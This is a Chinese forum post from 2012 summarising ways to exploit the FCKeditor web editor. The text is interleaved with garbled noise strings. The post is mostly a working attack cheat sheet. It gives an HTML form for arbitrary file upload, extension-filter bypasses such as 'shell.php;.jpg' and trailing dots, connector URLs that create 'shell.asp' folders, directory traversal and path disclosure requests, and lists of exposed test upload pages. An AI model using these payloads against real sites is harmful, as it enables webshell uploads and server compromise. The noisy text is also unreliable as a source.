|
Fckeditor漏洞利用总结 查看编辑器版本' m& D7 g* r& N1 H1 D) x
FCKeditor/_whatsnew.html
( I7 m% K/ o( B5 B* W$ T; z$ g————————————————————————————————————————————————————————————— 2. Version 2.2 版本
G$ Z4 _, Q6 v; ]. B; OApache+linux 环境下在上传文件后面加个.突破!测试通过。" r( I0 r% q, ^: E6 U# m' y0 G; z1 @
————————————————————————————————————————————————————————————— 3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
) J' V/ d, Y% a& a0 c<form id="frmUpload" enctype="multipart/form-data"; v# Y: g# y! ^4 E7 Z3 k8 }" A A
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>6 r( w) x8 o8 R Z
<input type="file" name="NewFile" size="50"><br>- b8 Z& \4 o7 u0 p0 t/ r! h
<input id="btnUpload" type="submit" value="Upload">
D8 p# c1 f8 [8 }. M6 @ I</form>5 r. ]6 G4 m% F D
————————————————————————————————————————————————————————————— 4.FCKeditor 文件上传“.”变“_”下划线的绕过方法
1 n. e1 S \ y \% @% Q/ W 很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
5 U7 G& V+ n) ? 4.1:提交shell.php+空格绕过5 |( B. C& u: U$ b
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。
) O, O/ r# I: ?3 u7 \' @% X6 W 4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
6 J5 W2 R1 [7 ^; y5 _& X: N————————————————————————————————————————————————————————————— 5. 突破建立文件夹( I4 H/ q) n" |% M1 P6 H
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684* R& N: u3 v9 h
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp& [$ @, T* c3 _* d l' R
————————————————————————————————————————————————————————————— 6. FCKeditor 中test 文件的上传地址: u5 Z5 @. T9 B. ?# a, v0 k
FCKeditor/editor/filemanager/browser/default/connectors/test.html
3 F& G) g* S+ L' R0 xFCKeditor/editor/filemanager/upload/test.html
- k7 I- Y/ n! f% k' n) g. c2 oFCKeditor/editor/filemanager/connectors/test.html; S- b0 v$ A* Z2 w6 V ` X
FCKeditor/editor/filemanager/connectors/uploadtest.html
# F/ ]3 z7 l. f% r—————————————————————————————————————————————————————————————7 G U$ O0 k6 K) A E( l
7.常用上传地址
; m$ W2 J8 G5 E5 x# y$ a. r5 h. ZFCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
i. c0 t6 R0 I. ~' ^$ Z4 iFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp
4 w2 {9 I5 Y9 z0 Z7 oFCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)- v. U' |/ Z# o& E4 K6 F; d- |
JSP 版:4 W; L4 z3 C; n" P9 ]6 S
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp4 B4 I! h; d& `& ]( S4 g
注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文& `6 F& T; P+ P; `# Q
件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。& A- N J% L! F$ C4 L c
————————————————————————————————————————————————————————————— 8.其他上传地址
0 H( R) c: W) qFCKeditor/_samples/default.html
! q( j4 T' e' Y0 B6 l( p; p# LFCKeditor/_samples/asp/sample01.asp6 z; x7 q3 I- a2 \, c
FCKeditor/_samples/asp/sample02.asp
2 ^: K# @9 N) `% c$ q; GFCKeditor/_samples/asp/sample03.asp) [: J/ m* j( e" O5 w' D7 W3 G
FCKeditor/_samples/asp/sample04.asp2 T+ h+ ?. s9 X& t5 x" M/ |
一般很多站点都已删除_samples 目录,可以试试。
- y' n* ]3 |8 k% [, ^) iFCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。
2 f- G+ J% Z& n————————————————————————————————————————————————————————————— 9.列目录漏洞也可助找上传地址8 h. U. Y- r3 E$ P
Version 2.4.1 测试通过
. c# P+ R! |4 q修改CurrentFolder 参数使用 ../../来进入不同的目录
' J* x6 f: u4 o# S5 [8 K/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp! p6 x) z% c* a* i- G a$ [
根据返回的XML 信息可以查看网站所有的目录。
" s; n& C) E" LFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
/ ]( t5 A# e7 c- e7 ]也可以直接浏览盘符:$ a9 S2 F& T, F- q' K& \
JSP 版本:
3 @4 Q; R( N7 u+ b3 \FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
9 P0 G( g, ~* H$ ~( J————————————————————————————————————————————————————————————— 10.爆路径漏洞
& A4 I u5 |* \& U$ r- h0 j3 u0 n+ kFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
' T1 j) ?8 M- q9 y- E————————————————————————————————————————————————————————————— 11. FCKeditor 被动限制策略所导致的过滤不严问题* {; E; ]6 b3 \/ J0 q1 S
影响版本: FCKeditor x.x <= FCKeditor v2.4.3) X% Q- I$ j/ u8 z
脆弱描述:
# w6 j4 L# b& e: n# a, iFCKeditor v2.4.3 中File 类别默认拒绝上传类型:
: n& I$ }2 ?- N, _* Ohtml|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
, Q! d- a3 y/ Y6 d% l& p H; EFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]! G5 U. w+ K ]( q
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。
+ j, i+ o! Q: ?2 { G3 q, c 在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg! | 
发表于 2012-9-5 20:23:31
收藏
支持
反对